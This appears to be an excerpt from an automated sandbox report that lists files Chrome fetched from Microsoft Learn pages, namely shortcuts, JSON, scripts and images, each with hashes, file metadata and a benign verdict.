                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......c..D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.4....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.4....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.4....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.4..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.4...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............R.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 05:38:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                        Entropy (8bit):3.985271538837111
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:8j0dtThLBKAH+idAKZdA1UehBiZUk1W1qehYxy+C:8jK/Kt94xy
                                                                                                                                                                                                        MD5:5EF4B353843E12DF49F754473506CD9E
                                                                                                                                                                                                        SHA1:1971058D8FDC895EA4D03A965F76687B1D284E95
                                                                                                                                                                                                        SHA-256:59C1DF558237A84482896A6A8992BEE9220FADE4E90204E574EE40C5FD805E34
                                                                                                                                                                                                        SHA-512:F007A103756217FF4139A69497890B559E65080D6827CFE6383EC1A1EC95E6B03AE4D97679E71C86531FE722F76E9ADE6C9BF2784901237091A8D8951E629952
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....\x..D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.4....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.4....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.4....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.4..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.4...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............R.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 2 05:38:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                        Entropy (8bit):3.998422297621171
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:8JZ0dtThLBKAH+idAKZdA1duTrehOuTbbiZUk5OjqehOuTbKxy+yT+:8rK/KqTYTbxWOvTbKxy7T
                                                                                                                                                                                                        MD5:E17379B457CE326B0EFADD925EAA17D8
                                                                                                                                                                                                        SHA1:42EA3ABDFC3DDA67E3A6CAD18137209036704426
                                                                                                                                                                                                        SHA-256:7CE3421BE06B96C1B08866084ED0A45CD1CA68C682D39328ED70345791889410
                                                                                                                                                                                                        SHA-512:9BFADE08AE851C080399F92B733AC7AFF1895B066FD35352BF2237A817600863E900AB541D50EFE6476C6D7DE960DC5EEBF29EA326F644FA6818AB0ED7603941
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......8..D..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.4....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.4....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.4....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.4..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.4...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............R.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):25422
                                                                                                                                                                                                        Entropy (8bit):5.151101794904936
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:63jLjnjrjGjXMQjtzjMFzXYHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFr7:aHBQv11pOVqlh382/rIN1D
                                                                                                                                                                                                        MD5:B5C4D5CE538E3982A376EC2923192D6B
                                                                                                                                                                                                        SHA1:A1BD7A4345A58117D6201305E0B5CB893C827BAD
                                                                                                                                                                                                        SHA-256:5F999F0A104864DCE808453CEBB0B7291ADCDF2516E40011B0BB4E9ACCD71C0C
                                                                                                                                                                                                        SHA-512:87A71EF2621453B2DE11DA60E02EED762F9FFBAD9D7052CB95CD1FBB6311E8AE3E5D430FC2315AC3FC20A06E627EAD95FC5E4F5B0AA17206728120A4CA9FB6AA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):207935
                                                                                                                                                                                                        Entropy (8bit):5.420780972514107
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                        MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                        SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                        SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                        SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                                        Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):25422
                                                                                                                                                                                                        Entropy (8bit):5.151101794904936
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:63jLjnjrjGjXMQjtzjMFzXYHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFr7:aHBQv11pOVqlh382/rIN1D
                                                                                                                                                                                                        MD5:B5C4D5CE538E3982A376EC2923192D6B
                                                                                                                                                                                                        SHA1:A1BD7A4345A58117D6201305E0B5CB893C827BAD
                                                                                                                                                                                                        SHA-256:5F999F0A104864DCE808453CEBB0B7291ADCDF2516E40011B0BB4E9ACCD71C0C
                                                                                                                                                                                                        SHA-512:87A71EF2621453B2DE11DA60E02EED762F9FFBAD9D7052CB95CD1FBB6311E8AE3E5D430FC2315AC3FC20A06E627EAD95FC5E4F5B0AA17206728120A4CA9FB6AA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                        Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):15427
                                                                                                                                                                                                        Entropy (8bit):7.784472070227724
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                        MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                        SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                        SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                        SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):52717
                                                                                                                                                                                                        Entropy (8bit):5.462668685745912
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                        MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                        SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                        SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                        SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1432
                                                                                                                                                                                                        Entropy (8bit):4.986131881931089
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                        MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                        SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                        SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                        SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                                        Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):52717
                                                                                                                                                                                                        Entropy (8bit):5.462668685745912
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                        MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                        SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                        SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                        SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1173007
                                                                                                                                                                                                        Entropy (8bit):5.503893944397598
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                        MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                        SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                        SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                        SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                                        Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13339
                                                                                                                                                                                                        Entropy (8bit):7.683569563478597
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                        MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                        SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                        SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                        SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17174
                                                                                                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1817143
                                                                                                                                                                                                        Entropy (8bit):5.501007973622959
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                        MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                        SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                        SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                        SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
